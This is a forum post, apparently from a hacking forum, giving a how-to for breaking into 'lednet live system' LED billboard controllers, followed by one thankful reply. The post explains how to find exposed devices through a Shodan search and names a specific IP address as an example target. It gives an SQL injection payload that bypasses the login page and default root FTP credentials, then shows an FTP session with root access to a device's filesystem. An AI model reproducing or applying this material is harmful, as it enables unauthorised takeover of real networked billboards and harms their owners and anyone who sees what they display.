Terry.Crews Posted February 2, 2017 Report Share Posted February 2, 2017 (edited) Step 1. Register to shodan Step 2. Look up: title:"lednet live system" You'll find some! Example: 186.206.188.175:8060/en/main.html How to hack it? Well the Username Parameter is vulnerable to SQL Injection...... So to login, paste -1558" OR 9005=9005 AND "UxGI"="UxGI in the username parameter and anything in the password input. Now click login! Also another vulnerability is a default password vuln. You can basically get root ftp access to all of these billboards.... Username: root Password: 111111 $ ftp 186.206.188.175 Connected to 186.206.188.175. 220 Welcome to blah FTP service. Name (186.206.188.175): root 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd / 250 Directory successfully changed. ftp> ls 229 Entering Extended Passive Mode (|||41314|). 150 Here comes the directory listing. drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d drwxr-xr-x 7 0 0 0 May 21 18:08 dev lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e drwxr-xr-x 1 0 0 748 Jan 01 1970 etc lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f drwxr-xr-x 1 0 0 36 Jan 01 1970 home drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt drwxr-xr-x 1 0 0 0 Jan 01 1970 opt dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc drwxr-xr-x 1 0 0 116 Jan 01 1970 root drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin drwxr-xr-x 12 0 0 0 Jan 01 1970 sys drwxrwxrwt 6 0 0 720 May 21 18:16 tmp drwxr-xr-x 1 0 0 108 Jan 01 1970 usr drwxr-xr-x 3 0 0 672 Jan 01 1970 var drwxr-xr-x 4 0 0 288 Jan 01 1970 www 226 Directory send OK. ftp> Copiat de le HF... Edited February 2, 2017 by Terry.Crews 2 Quote Link to comment Share on other sites More sharing options...
shorty420 Posted April 21, 2017 Report Share Posted April 21, 2017 Thx for this tutorial Quote Link to comment Share on other sites More sharing options...